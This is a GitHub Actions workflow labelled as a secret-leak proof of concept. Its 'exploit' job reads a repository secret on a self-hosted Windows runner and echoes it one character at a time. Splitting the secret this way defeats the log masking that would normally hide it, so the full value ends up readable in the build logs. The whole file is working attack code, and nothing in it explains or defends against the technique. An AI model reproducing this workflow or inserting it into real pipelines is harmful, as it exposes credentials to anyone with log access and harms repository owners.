name: full-secret-leak-poc
on: workflow_dispatch
jobs:
  exploit:
    runs-on: [self-hosted, Windows, X64]
    steps:
      - name: Extract Complete Secret
        env:
          SECRET: ${{ secrets.TEST_SECRET }}
        shell: cmd
        run: |
          echo Extracting full secret character by character:
          for /L %%i in (0,1,20) do @call echo Char %%i: %%SECRET:~%%i,1%%
